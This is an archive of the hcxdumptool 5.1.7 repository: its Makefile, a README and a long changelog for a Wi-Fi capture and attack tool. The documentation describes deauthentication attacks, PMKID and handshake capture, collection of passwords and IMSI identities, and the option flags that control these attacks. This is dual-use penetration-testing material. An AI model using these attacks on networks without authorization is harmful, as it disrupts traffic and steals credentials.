pax_global_header00006660000000000000000000000064135037002170014510gustar00rootroot0000000000000052 comment=992cd9e9eb225bc74d253a4d16c29a83899bde2e hcxdumptool-5.1.7/000077500000000000000000000000001350370021700140705ustar00rootroot00000000000000hcxdumptool-5.1.7/.gitignore000066400000000000000000000000251350370021700160550ustar00rootroot00000000000000hcxdumptool hcxpioff hcxdumptool-5.1.7/.gitmodules000066400000000000000000000001731350370021700162460ustar00rootroot00000000000000[submodule "include/android-ifaddrs"] path = include/android-ifaddrs url = https://github.com/morristech/android-ifaddrs hcxdumptool-5.1.7/Android.mk000066400000000000000000000003311350370021700157760ustar00rootroot00000000000000LOCAL_PATH:=$(call my-dir) HCX_CFLAGS:=-std=gnu99 -O3 -Wall -Wextra include $(CLEAR_VARS) LOCAL_MODULE := hcxdumptool LOCAL_CFLAGS += $(HCX_CFLAGS) LOCAL_SRC_FILES := hcxdumptool.c include $(BUILD_EXECUTABLE) hcxdumptool-5.1.7/AndroidManifest.xml000066400000000000000000000002411350370021700176560ustar00rootroot00000000000000 hcxdumptool-5.1.7/Makefile000066400000000000000000000017571350370021700155420ustar00rootroot00000000000000PREFIX ?=/usr/local INSTALLDIR = $(DESTDIR)$(PREFIX)/bin HOSTOS := $(shell uname -s) GPIOSUPPORT=off CC ?= gcc CFLAGS ?= -O3 -Wall -Wextra CFLAGS += -std=gnu99 INSTFLAGS = -m 0755 ifeq ($(HOSTOS), Linux) INSTFLAGS += -D endif all: build build: ifeq ($(HOSTOS), Linux) $(CC) $(CFLAGS) $(CPPFLAGS) -o hcxpioff hcxpioff.c $(LDFLAGS) $(CC) $(CFLAGS) $(CPPFLAGS) -o hcxdumptool hcxdumptool.c $(LDFLAGS) else $(info OS not supported) endif install: build ifeq ($(HOSTOS), Linux) install $(INSTFLAGS) hcxpioff $(INSTALLDIR)/hcxpioff install $(INSTFLAGS) hcxdumptool $(INSTALLDIR)/hcxdumptool else $(info OS not supported) endif ifeq ($(HOSTOS), Linux) rm -f hcxpioff rm -f hcxdumptool else $(info OS not supported) endif rm -f *.o *~ clean: ifeq ($(HOSTOS), Linux) rm -f hcxpioff rm -f hcxdumptool else $(info OS not supported) endif rm -f *.o *~ uninstall: 
ifeq ($(HOSTOS), Linux) rm -f $(INSTALLDIR)/hcxpioff rm -f $(INSTALLDIR)/hcxdumptool else $(info OS not supported) endif hcxdumptool-5.1.7/README.md000066400000000000000000000165451350370021700153620ustar00rootroot00000000000000hcxdumptool ============== Small tool to capture packets from wlan devices. After capturing, upload the "uncleaned" cap here (https://wpa-sec.stanev.org/?submit) to see if your ap or the client is vulnerable by using common wordlists. Convert the cap to hccapx and/or to WPA-PMKID-PBKDF2 hashline (16800) with hcxpcaptool (hcxtools) and check if wlan-key or plainmasterkey was transmitted unencrypted. Brief description -------------- Stand-alone binaries - designed to run on Raspberry Pi's with installed Arch Linux. It may work on other Linux systems (notebooks, desktops) and distributions, too. Detailed description -------------- | Tool | Description | | -------------- | ------------------------------------------------------------------------------------------------------ | | hcxdumptool | Tool to run several tests to determine if access points or clients are vulnerable | | hcxpioff | Turns Raspberry Pi off via GPIO switch | Compile -------------- Simply run: ``` make make install (as super user) ``` Compile for Android -------------- You need: * Android NDK installed in your system and in path variable * This repository cloned with all submodules (`--recursive` flag in `git clone` or `git submodules update` command run) Just run `ndk-build` - built executables for some architectures should be created inside `libs` directory. Copy it to your phone and enjoy. Requirements -------------- * Operatingsystem: Arch Linux (strict), Kernel >= 4.19 (strict). It may work on other Linux systems (notebooks, desktops) and distributions, too (no support for other distributions, no support for other operating systems). 
Don't use Kernel 4.4 (rt2x00 driver regression) * Chipset must be able to run in monitor mode and driver must support monitor mode (strict by: ip and iw). Recommended: MEDIATEK (MT7601) or RALINK (RT2870, RT3070, RT5370) chipset * Raspberry Pi A, B, A+, B+, Zero (WH). (Recommended: Zero (WH) or A+, because of a very low power consumption), but notebooks and desktops may work, too. * GPIO hardware mod recommended (push button and LED). Adapters -------------- hcxdumptool need full (monitor mode and full packet injection running all packet types) and exclusive access to the adapter! Otherwise it will not start! Get information about VENDOR, model, chipset and driver here: https://wikidevi.com Manufacturers do change chipsets without changing model numbers. Sometimes they add (v)ersion or (rev)vision. This list is for information purposes only and should not be regarded as a binding presentation of the products: | VENDOR MODEL | ID | | -------------------- | -------------------------------------------------------------------- | | EDIMAX EW-7711UAN | ID 7392:7710 Edimax Technology Co., Ltd | | ALLNET ALL-WA0150N | ID 148f:7601 Ralink Technology, Corp. MT7601U Wireless Adapter | | TENDA W311U+ | ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter | | TP-LINK TL-WN722N v1 | ID 0cf3:9271 Qualcomm Atheros Communications AR9271 802.11n | | ALFA AWUS036H | ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter | Always verify the actual chipset with 'lsusb' and/or 'lspci'! Due to a bug in xhci subsystem other devices may not work at the moment: https://bugzilla.kernel.org/show_bug.cgi?id=202541 No support for a third party driver which is not part of the official kernel (https://www.kernel.org/) No support for a driver which doesn't support monitor and packet injection, native - if you need this features, do a request on www.kernel.org Antennas -------------- The best high frequency amplifier is a good antenna! 
| VENDOR MODEL | TYPE | | ---------------------- | --------------- | | LOGILINK WL0097 | grid parabolic | | TP-LINK TL-ANT2414 A/B | panel | | LevelOne WAN-1112 | panel | | DELOCK 88806 | panel | | TP-LINK TL-ANT2409 A | panel | Useful scripts -------------- | Script | Description | | ------------ | -------------------------------------------------------- | | bash_profile | Autostart for Raspberry Pi (copy to /root/.bash_profile) | | pireadcard | Back up a Pi SD card | | piwritecard | Restore a Pi SD card | | makemonnb | Example script to activate monitor mode | | killmonnb | Example script to deactivate monitor mode | Hardware mod - see docs gpiowait.odg (hcxdumptool) -------------- LED flashes 5 times if hcxdumptool successfully started LED flashes every 5 seconds if everything is fine and signals are received LED turns on, if no signal received during the last past 5 seconds Press push button at least > 5 seconds until LED turns on (also LED turns on if hcxdumptool terminates) Green ACT LED flashes 10 times Raspberry Pi turned off and can be disconnected from power supply Do not use hcxdumptool and hcxpioff together! Hardware mod - see docs gpiowait.odg -------------- LED flashes every 5 seconds 2 times if hcxpioff successfully started Press push button at least > 5 seconds until LED turns on Green ACT LED flashes 10 times Raspberry Pi turned off safely and can be disconnected from power supply Do not use hcxdumptool or hcxpioff together! 
Warning -------------- You must use hcxdumptool only on networks you have permission to do this, because: * hcxdumptool is able to prevent complete wlan traffic (depends on selected options) * hcxdumptool is able to capture PMKIDs from access points (only one single PMKID from an access point required) (use hcxpcaptool to save them to file) * hcxdumptool is able to capture handshakes from not connected clients (only one single M2 from the client is required) (use hcxpcaptool to save them to file) * hcxdumptool is able to capture handshakes from 5GHz clients on 2.4GHz (only one single M2 from the client is required) (use hcxpcaptool to save them to file) * hcxdumptool is able to capture passwords from the wlan traffic (use hcxpcaptool -E to save them to file, together with networknames) * hcxdumptool is able to capture plainmasterkeys from the wlan traffic (use hcxpcaptool -P to save them to file) * hcxdumptool is able to request and capture extended EAPOL (RADIUS, GSM-SIM, WPS) (hcxpcaptool will show you information about them) * hcxdumptool is able to capture identities from the wlan traffic (for example: request IMSI numbers from mobile phones - use hcxpcaptool -I to save them to file) * hcxdumptool is able to capture usernames from the wlan traffic (for example: user name of a server authentication - use hcxpcaptool -U to save them to file) * Do not use a logical interface and leave the physical interface in managed mode * Do not use hcxdumptool in combination with aircrack-ng, reaver, bully or other tools which takes access to the interface * Stop all services which takes access to the physical interface (NetworkManager, wpa_supplicant,...) 
* Do not use tools like macchanger, as they are useless, because hcxdumptool uses its own random mac address space hcxdumptool-5.1.7/changelog000066400000000000000000000741761350370021700157610ustar00rootroot0000000000000023.06.2019 ========== moved to v 5.1.7 hcxdumptool: improved help fixed pcpng option header 12.06.2019 ========== hcxdumptool: ignore more warnings if --ignore_warning is selcted do not report issues if you run this option!!! 29.05.2019 ========== hcxdumptool moved to v 5.1.5 19.05.2019 ========== hcxdumptool: activated option --ignore warning --ignore_warning : ignore warnings try this if you get some driver warnings do not report issues 16.04.2019 ========== updated wiki device and README.md. This adapters are working fine, running kernel 4.19, 4.20 and 5.0: EDIMAX EW-7711UAN ID 7392:7710 Edimax Technology Co., Ltd ALLNET ALL-WA0150N ID 148f:7601 Ralink Technology, Corp. MT7601U Wireless Adapter TENDA W311U+ ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter LogiLink WL0151 ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter regardles of the xhci issue. 
14.04.2019 ========== removed all device names from README.md, because VENDORS often change chipsets or driver errors occur: v1 of a device is working fine, while v2 doesn't work device A, running driver A is working fine, while device B running driver A doesn't work driver doesn't support monitor mode driver support monitor mode, but doesn't support packet injection Examples here: https://bugzilla.kernel.org/show_bug.cgi?id=202241 https://bugzilla.kernel.org/show_bug.cgi?id=202243 https://bugzilla.kernel.org/show_bug.cgi?id=202541 To find a working device, I recommend to read wikidevi: https://wikidevi.com/ 02.04.2019 ========== hcxdumptool now use this radiotap header: static const uint8_t hdradiotap[] = { 0x00, 0x00, // radiotap version + pad byte 0x0e, 0x00, // radiotap header length 0x06, 0x8c, 0x00, 0x00, // bitmap 0x00, // flags 0x02, // rate 0x14, // tx power 0x01, // antenna 0x08, 0x00 // tx flags #define HDRRT_SIZE sizeof(hdradiotap) }; read more about radiotap header here: https://www.kernel.org/doc/Documentation/networking/mac80211-injection.txt header is working with: ID 148f:761a Ralink Technology, Corp. MT7610U ("Archer T2U" 2.4G+5G WLAN Adapter removed "USB ID 7392:a812 Edimax Technology Co., Ltd" from "known as working device list" because this driver is not working with the radiotap header. 30.03.2019 ========== hcxdumptool: added new option --silent --silent : do not transmit! hcxdumptool is acting like a passive dumper added RTL8187. Removed the wron devices from the list (only RT3070 ia affected) * USB ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter (ALFA AWUS036H) * USB ID 0bda:8189 Realtek Semiconductor Corp. RTL8187B Wireless 802.11g 54Mbps Network Adapter 29.03.2019 ========== added cflag DEBUG if compiled with DEBUG, hcxdumptool show raw packets and raw GSP data, directly received from the device removed ALFA AWUS036NH from the "known as workinging list", because the device doesn't work any longer, running kernel 5.0. 
28.03.2019 ========== removed devices from "known working" list: * USB ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter (ALFA AWUS036H) * USB ID 0bda:8189 Realtek Semiconductor Corp. RTL8187B Wireless 802.11g 54Mbps Network Adapter because they are not working running kernel 5.0 27.03.2019 ========== removed wiringPi dependency now we are running "bare metal" - complete GPIO stuff moved to hcxdumptool and hcxpioff do not use wiringPi in combination with hcxdumptool and/or hcxpioff Makefile: removed DOGPIOSUPPORT hcxdumptool: changed options wiringPi options to GPIO options --gpio_button= : Raspberry Pi GPIO pin number of button (2...27) default = GPIO not in use --gpio_statusled= : Raspberry Pi GPIO number of status LED (2...27) default = GPIO not in use hcxpioff: changed options wiringPi options to GPIO options --gpio_button= : Raspberry Pi GPIO pin number of button (2...27) default = GPIO not in use --gpio_statusled= : Raspberry Pi GPIO number of status LED (2...27) default = GPIO not in use The GPIO is disabled on default. If you like to activate GPIO support you must do the hardware modifactions as described here: doc/gpiowait.odg and set the options according to your modification. You can choose every GPIO pin, as long as you use a pull down resistor to ground. Raspberry model should be detected by automatic and according to the revision we use: GPIO mem 0x20000000 for A, B, A+, B+, and Zero, Zero W(H) GPIO mem 0x3F000000 for 2B, 3B, 3A+, 3B+ compute modules (CMx) are not supported. 20.03.2019 ========== hcxdumptool: GPIO pins are no longer hard coded! --wpi_button= : wiringPi number of of button (0...31, Raspberry Pi A and B: 0 .. 16) default = 7 --wpi_statusled= : wiringPi number of status LED (0...31, Raspberry Pi A and B: 0 .. 16) default = 0 19.03.2019 ========== hcxpioff: refactored - GPIO pins are no longer hard coded! --wpi_button= : wiringPi number of of button (0...31, Raspberry Pi A and B: 0 .. 
16) default = 7 --wpi_statusled= : wiringPi number of status LED (0...31, Raspberry Pi A and B: 0 .. 16) default = 0 --help : show this help --version : show version 16.03.2019 ========== added man page hcxdumptool.1 removed device from list: USB ID 7392:a812 Edimax Technology Co., Ltd (Edimax AC600 USB / Manufacturer: Realtek) because the driver from here: https://github.com/aircrack-ng/rtl8812au is no longer working on kernel 5.0 09.03.2019 ========== hcxdumptool moved to v 5.1.4 hcxdumptool: added new option: --ignore_warning : hcxdumptool will not terminate if other services take access on the device : warning: expect problems if hcxdumptool tries to change channels From now on, hcxdumptool will not terminate during the initalization if another service take access on the interface. Expect problems and do not report issues related to this option!!!! From now on, hcxdumptool will also show channel and frequency (when running option -C) 1 / 2412MHz (20 dBm) 2 / 2417MHz (20 dBm) 3 / 2422MHz (20 dBm) 4 / 2427MHz (20 dBm) 5 / 2432MHz (20 dBm) 6 / 2437MHz (20 dBm) 7 / 2442MHz (20 dBm) 8 / 2447MHz (20 dBm) 9 / 2452MHz (20 dBm) 10 / 2457MHz (20 dBm) 11 / 2462MHz (20 dBm) 12 / 2467MHz (20 dBm) 13 / 2472MHz (20 dBm) 09.03.2019 ========== hcxdumptool: added improved warning message Now hcxdumptool print the error message received from the driver inside the brackets $ hcxdumptool -i wlp3s0f0u1 -c 14 initialization... warning: unable to set channel 14 (Invalid argument) - removed this channel from scan list In this case the user tried to set channel 14. The driver doesn't support this and responds with Invalid argument 07.03.2019 ========== hcxdumptool: added debug code in main packet loop [processpackets()] to print raw GPS data, received from GPSD: /* printf("\ndebug: %s\n", gpsddata); */ uncomment this before you run make to retrieve this values. 06.03.2019 ========== hcxdumptool: added GPS date and GPS time to status and pcapng comment field. 
$ sudo hcxdumptool -i wlp3s0f0u1 --use_gpsd -o test.pcapng initialization... connecting to GPSD... waiting up to 5 seconds to retrieve first position GPSD activated start capturing (stop with ctrl+c) GPS LATITUDE.............: 49.126403 GPS LONGITUDE............: 4.626175 GPS ALTITUDE.............: 129.500000 GPS DATE.................: 06.03.2019 GPS TIME.................: 21:52:41 INTERFACE................: wlp3s0f0u1 ERRORMAX.................: 100 errors FILTERLIST...............: 0 entries MAC CLIENT...............: f04f7c89dabb MAC ACCESS POINT.........: 980ee432604d (incremented on every new client) EAPOL TIMEOUT............: 150000 REPLAYCOUNT..............: 61455 ANONCE...................: 182972399cd2e65deb7941601cca14b644681c092dcf6f704935c7f3d2eaceea INFO: cha=11, rx=7080, rx(dropped)=1676, tx=408, powned=10, err=0, lat=49.126342, lon=4.626268, alt=129.500000, gpsdate=06.03.2019, gpstime=22:01:55^C terminated... $ tshark -r test.pcapng-0 -Y frame.comment -T fields -E header=y -e frame.number -e frame.time -e wlan.sa -e frame.comment 172 Mar 6, 2019 23:01:48.793212000 CET 1a:f8:7c:91:24:a3 lat:49.126337,lon:4.626268,alt:129.500000,date:06.03.2019,time:22:01:48 05.03.2019 ========== hcxdumptool: removed general info about tx-power - now we use iw style to show tx-power/channel hcxdumptool -i -C initialization... available channels: 1 (20 dBm) 2 (20 dBm) 3 (20 dBm) ... 
132 (26 dBm) 136 (26 dBm) 140 (26 dBm) 149 (13 dBm) 153 (13 dBm) 157 (13 dBm) 161 (13 dBm) 165 (13 dBm) 26.02.2019 ========== hcxdumptool moved to version 5.1.3 due several bug fixes and improved rcascan status output 18.02.2019 ========== release hcxdumptool v 5.1.2 due to serveral bugfixes 02.02.2019 ========== release hcxdumptool v 5.1.1 20.01.2019 ========== hcxdumptool: added new MT76 device: "TP-LINK Archer Archer T2U" working with kernel: 4.19, 4.20 (some issues), 5.0 read more here: https://github.com/ZerBea/hcxdumptool/issues/42 https://bugzilla.kernel.org/show_bug.cgi?id=202241 https://bugzilla.kernel.org/show_bug.cgi?id=202243 11.01.2019 ========== hcxdudmptool: From now on, we assume that a packet is outgoing, if dBm Antenne Signal is absent. 08.01.2019 ========== hcxdudmptool and mac80211_hwsim mac80211_hwsim is a Linux kernel module that can be used to simulate arbitrary number of IEEE 802.11 radios for mac80211. It can be used to test hcxdumptool: load module: $ sudo modprobe mac80211_hwsim run hcxdumptool to retrieve informations about the interface: $ hcxdumptool -I wlan interfaces: 020000000000 wlan0 (mac80211_hwsim) 020000000100 wlan1 (mac80211_hwsim) bring monitor interface up: $ sudo sudo ip link set hwsim0 up run hcxdumptool: $ sudo hcxdumptool -i wlan0 initialization... start capturing (stop with ctrl+c) INTERFACE:...............: wlan0 ERRORMAX.................: 100 errors FILTERLIST...............: 0 entries MAC CLIENT...............: c8aacc9c01ec MAC ACCESS POINT.........: 580943000000 (incremented on every new client) EAPOL TIMEOUT............: 150000 REPLAYCOUNT..............: 62263 ANONCE...................: 513282ebb604e6e10c450d6c3eaa6428d118b54abeef4672be3ef700052305d5 INFO: cha=11, rx=0, rx(dropped)=0, tx=120, powned=0, err=0 run wireshark on wlan0 or hwsim0 to monitor hcxdumptool output. do not forget to remove mac80211_hwsim if the module is not longer needed! 
read more here: https://www.kernel.org/doc/readme/Documentation-networking-mac80211_hwsim-README 04.01.2019 ========== hcxdumptool - changed flash time: LED flashes every 5 seconds = everything is fine LED stays on = no signal received during the last past five seconds hcxdumptool - ignore double outgoing packets (rth->it_present == 0) 03.01.2019 ========== hcxdumptool: changed flash time (5 times longer on ERROR) hcxpioff: changed flash time 20.12.2018 ========== improved detection of broken driver from now on GPIO LED blinks twice every 5 seconds - if a possbile driver issue is detected - if no packets received during the last past 5 seconds another indicator is that the incomming packetcounter (rx=xxxx) doesn't increase or dmesg show this error: [65786.808078] ieee80211 phy2: rt2x00queue_flush_queue: Warning - Queue 14 failed to flush [65824.174119] ieee80211 phy2: rt2x00queue_flush_queue: Warning - Queue 14 failed to flush [67801.029527] ------------[ cut here ]------------ it seems to be a kernel issue that hcxdumptool isn't able to handle, automatically: https://bbs.archlinux.org/viewtopic.php?id=237028 https://bugs.openwrt.org/index.php?do=details&task_id=929&opened=169&status%5B0%5D= https://community.spiceworks.com/topic/2132263-ubuntu-16-04-wifi-disconnects-randomly https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1750226 https://www.raspberrypi.org/forums/viewtopic.php?t=206815 workaround: 1) get driver information $ hcxdumptool -I wlan interfaces: 7cdd90xxxxxx wlp3s0f0u2 (rt2800usb) 2) remove module $ modprobe -r rt2800usb 3) load module $ modprobe rt2800usb 18.12.2018 ========== added new option to set station MAC address --station_mac= : use this MAC address for station format = 112233445566 format = 112233000000 (to set only OUI) format = 445566 (to set only NIC) added new option to set access point MAC address --ap_mac= : use this MAC address for access point as start MAC format = 112233445566 format = 112233000000 (to set only OUI) format = 
445566 (to set only NIC) warning: do not use a MAC of an existing access point in your range improved detection of broken driver set default ERRORMAX to 100 added option to set ERRORMAX -T : set maximum ERRROR count (hcxdumptool terminates when the value is reached) default: 100 errors Remarks: errorcount will increase by one, if send packet (tx=xxx) > 3*incomming packets (rx=xxx) 15.12.2018 ========== improved random generator (now seeded with and adapter mac address) Raspberry Pi: improved handling of GPIO switch 07.12.2018 ========== restore interface settings after -C improved help menu -more informations about monitor mode -more informations about packet injection monitor mode and packet injection must be supported by the driver, otherwise hcxdumptool will not work. 05.12.2018 ========== moved to v 5.1.0 (according to hashcat) 04.12.2018 ========== added new option: -C : show available channels and quit 27.11.2018 ========== added new option: --poweroff : once hcxdumptool finished, power off system 26.11.2018 ========== several big endian fixes switched to version 5.0.1 07.10.2018 ========== added new option filter mode 3: --filterlist= : mac filter list format: 112233445566 + comment maximum line lenght 255, maximum entries 64 --filtermode= : mode for filter list 1: use filter list as protection list (default) in transmission branch receive everything, interact with all APs and CLIENTs in range, except(!) 
the ones from the filter list 2: use filter list as target list in transmission branch receive everything, only interact with APs and CLIENTs in range, from the filter list 3: use filter list as target list in receiving branch only receive APs and CLIENTs in range, from the filter list 30.10.2018 ========== moved to version 5.0.0 05.10.2018 ========== added more error messages fixed small bug in error count on channel change failure 04.10.2018 ========== show GPS position (if activated) in status line (refresh every 5 seconds) fixed broken status display on rcascan increased speed of rcascan fixed error handling if selected channels not supported by driver if option -t is not set, skip empty channels after one second improved scan list fixed some static var 01.10.2018 ========== changed order of channels in default scan list: 1, 9, 6, 3, 11, 7, 1, 10, 6, 8, 11, 4, 1, 12, 6, 2, 11, 5, 13 27.09.2018 ========== added GPSD support (stored as comment in pcapng file) --use_gpsd : use GPSD to retrieve position add latitude, longitude and altitude to every pcapng frame device must be supported by GPSD: http://www.catb.org/gpsd/hardware.html (tested using: AktivePilot JENTRO BT-GPS-8) Retrieve GPS information with: $ tshark -r filename.pcapng -Y frame.comment -T fields -E header=y -e frame.number -e frame.time -e wlan.sa -e frame.comment write mac_ap to pcapng SHB write mac_sta to pcapng SHB SHB optioncodes: #define OPTIONCODE_MACMYAP 62107 #define OPTIONCODE_RC 62108 #define OPTIONCODE_ANONCE 62109 #define OPTIONCODE_MACMYSTA 62110 16.09.2018 ========== show warning if NetworkManager and/or wpa_supplicant is running 15.09.2018 ========== added Cisco Systems, Inc VENDOR information --station_vendor= : use this VENDOR information for station 0: transmit no VENDOR information (default) 1: Broadcom 2: Apple-Broadcom 3: Sonos 4: Netgear-Broadcom 5: Wilibox Deliberant Group LLC 6: Cisco Systems, Inc 11.09.2018 ========== You can “uncomment a line” in a configuration file by 
removing the # at the start of the line. Or, to “comment out” a line, add a # character to the start of the line. 001122334455 myap # aabbccddeeff ignore this mac 112233445566 second ap # this is may comment 05.09.2018 ========== added Netgear Broadcom VENDOR information added Wilibox Deliberant Group LLC VENDOR information 04.09.2018 ========== improved rcascan (show time and access points which hide their ESSID) prepare detection of PMF refactored access point handling handle 4096 access points simultaneously refactored client handling handle 4096 clients simultaneously speed up retrieving PMKIDs (< 1 minute) attack access points which hide their ESSID increased filter list line length increased filter list maximum entries added option to show beacons in status output: --enable_status= : enable status messages bitmask: 1: EAPOL 2: PROBEREQUEST/PROBERESPONSE 4: AUTHENTICATON 8: ASSOCIATION 16: BEACON added option to choose station VENDOR information: --station_chipset= : use this VENDOR information for station 0: transmit no VENDOR information (default) 1: Broadcom 2: Apple-Broadcom 3: Sonos 30.08.2018 ========== iw/ip functionality added! now hcxdumptool will set monitor mode and bring up interface! previous interface settings will be restored, when hcxdumptool terminated 19.08.2018 ========== parse SAE authentication 19.08.2018 ========== added radio assignment scan --do_rcascan : show radio channel assignment (scan for target access points) --save_rcascan= : output rca scan list to file when hcxdumptool terminated --save_rcascan_raw= : output file in pcapngformat unfiltered packets including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP) 17.08.2018 ========== detect NETWORK EAP authentication system transmit BROADCAST beacon 16.08.2018 ========== From now on we store open system authentications to pcapng only if they have have a vendor specific field. 
we are no longer interested in standard open system authentications (payload len = 6) changed some default values: -D : deauthentication interval default: 10 (every 10 beacons) the target beacon interval is used as trigger -A : ap attack interval default: 10 (every 10 beacons) --give_up_deauthentications=: disable transmitting deauthentications after n tries default: 100 tries (minimum: 4) affected: connections between client an access point deauthentication attacks will not work against protected management frames --give_up_ap_attacks= : disable transmitting directed proberequests after n tries default: 100 tries (minimum: 4) affected: client-less attack deauthentication attacks will not work against protected management frames 13.08.2018 ========== increased some attack values: --give_up_deauthentications=: disable transmitting deauthentications after n tries default: 100 tries (minimum: 4) affected: connections between client an access point deauthentication attacks will not work against protected management frames --give_up_ap_attacks= : disable transmitting directed proberequests after n tries default: 100 tries (minimum: 4) 07.08.2018 ========== moved to 4.2.1 added communication between hcxdumptool and hcxpcaptool via pcapng option fields: 62108 for REPLAYCOUNT uint64_t 62109 for ANONCE uint8_t[32] enabled hardware handshake instead of software handshake changed beavior auf status: --enable_status= : enables status messages bitmask: 1: EAPOL 2: PROBEREQUEST/PROBERESPONSE 4: AUTHENTICATON 8: ASSOCIATION Now we use a bitmask to deliver status messages. 
06.08.2018 ========== write ISB (Interface Statistic Block) at the end of a cpature 04.08.2018 ========== addet new option (--disable-active_scan) to hcxdumptool --disable_active_scan: do not transmit proberequests to BROADCAST using a BROADCAST ESSID 04.08.2018 ========== release hcxdumptool 4.2.0 complete refactored: -various new options -measurement of EAPOL timeout -full support for hashcat hashmodes -m 16800 and 16801 -now default format is pcapng $ ./hcxdumptool-bleeding --help hcxdumptool 4.2.0 (C) 2018 ZeroBeat usage : hcxdumptool example: hcxdumptool -o output.pcapng -i wlp39s0f3u4u5 -t 5 --enable_status options: -i : interface (monitor mode must be enabled) ip link set down iw dev set type monitor ip link set up -o : output file in pcapngformat management frames and EAP/EAPOL frames including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP) -O : output file in pcapngformat unencrypted IPv4 and IPv6 frames including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP) -W : output file in pcapngformat encrypted WEP frames including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP) -c : set scanlist (1,2,3,...) 
default scanlist: 1, 3, 5, 7, 9, 11, 13, 2, 4, 6, 8, 10, 12 maximum entries: 127 allowed channels: 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14 34, 36, 38, 40, 42, 44, 46, 48, 52, 56, 58, 60, 62, 64 100, 104, 108, 112, 116, 120, 124, 128, 132, 136, 140, 144, 147, 149, 151, 153, 155, 157 161, 165, 167, 169, 184, 188, 192, 196, 200, 204, 208, 212, 216 -t : stay time on channel before hopping to the next channel default: 5 seconds -E : EAPOL timeout default: 100000 = 1 second value depends on channel assignment -D : deauthentication interval default: 20 (every 20 beacons) the target beacon interval is used as trigger -A : ap attack interval default: 20 (every 20 beacons) the target beacon interval is used as trigger -I : show suitable wlan interfaces and quit -h : show this help -v : show version --filterlist= : mac filter list format: 112233445566 + comment maximum line lenght 128, maximum entries 32 --filtermode= : mode for filter list 1: use filter list as protection list (default) 2: use filter list as target list --disable_deauthentications: disable transmitting deauthentications affected: connections between client an access point deauthentication attacks will not work against protected management frames --give_up_deauthentications=: disable transmitting deauthentications after n tries default: 10 tries (minimum: 4) affected: connections between client an access point deauthentication attacks will not work against protected management frames --disable_disassociations : disable transmitting disassociations affected: retry (EAPOL 4/4 - M4) attack --disable_ap_attacks : disable attacks on single access points affected: client-less (PMKID) attack --give_up_ap_attacks= : disable transmitting directed proberequests after n tries default: 10 tries (minimum: 4) affected: client-less attack deauthentication attacks will not work against protected management frames --disable_client_attacks : disable attacks on single clients points affected: ap-less (EAPOL 2/4 - M2) 
attack --enable_status : enable status messages --help : show this help --version : show version 01.08.2018 ========== moved some stuff from hcxtools to hcxdumptool repository prepare complete refactoring! 04.03.2018 ========== hcxdumptool: added new option -W -W : WEP encrypted packets output file in pcapformat including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP) 04.03.2018 ========== hcxdumptool again complete refactored: 02.03.2018 ========== hcxdumptool is complete refactored: - improved scan engine - improved authentication engine (incl. Radio Measurement, and NULL frame detection) - dropped timer - use threads for LED and channel switch - use only one file descriptor for raw socket operations - working on Intel Corporation Centrino Ultimate-N 6300 (rev 3e) WiFi adapter (kernel >= 4.15) - working on Alfa AWUS036NH, Alfa AWUS036NHA - working on Alfa AWUS036ACH (driver: https://github.com/kimocoder/rtl8812au) - more channels allowed (depends on installed wireless regulatory domain) - simple usage: hcxdumptool -i -o dumpfile.pcap -t 5 interface (real interface - no monX) must be in monitor - all services/programs with access to the interface must be stopped! - new format of blacklist - and more... 
reported to run on Gentoo https://github.com/ZerBea/hcxdumptool_bleeding_testing/issues/2#issuecomment-369256915 reported to run on OpenWRT/LEDE https://github.com/ZerBea/hcxdumptool_bleeding_testing/issues/3#issuecomment-369756725 reported to run with Intel Corporation Centrino Ultimate-N 6300 (rev 3e) https://github.com/ZerBea/hcxdumptool_bleeding_testing/issues/2#issuecomment-369259800 $ hcxdumptool -h hcxdumptool 4.1.0 (C) 2018 ZeroBeat usage: hcxdumptool options: -i : interface (monitor mode must be enabled) ip link set down iw dev set type monitor ip link set up -o : output file in pcapformat including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP) -O : ip based traffic output file in pcapformat including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP) -c : set scanlist (1,2,3,... / default = default scanlist) default scanlist: 1, 3, 5, 7, 9, 11, 13, 2, 4, 6, 8, 10, 12 allowed channels: 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14 36, 40, 44, 48, 52, 56, 60, 64 100, 104, 108, 112, 116, 120, 124, 128, 132, 136, 140, 147, 151, 155, 167 -t : stay time on channel before hopping to the next channel default = 5 seconds -T : terminate after maximal errors : default: 1000000 -D : do not transmit deauthentications or disassociations -R : do not transmit requests -A : do not respond to requests from clients -B : blacklist (do not deauthenticate clients from these hosts) format = mac_ap:mac_sta:ESSID 112233445566:aabbccddeeff:networkname (max. 32 chars) -P : enable poweroff -s : enable status messages -I : show suitable wlan interfaces and quit -h : show this help -v : show version 27.02.2018 ========== Now recommendations since we have run into heavy problems with latest drivers and operating systems * Operating system: archlinux (strict), Kernel >= 4.14 (strict) * Raspberry Pi A, B, A+, B+ (Recommended: A+ = very low power consumption or B+), but notebooks and desktops could work, too. 
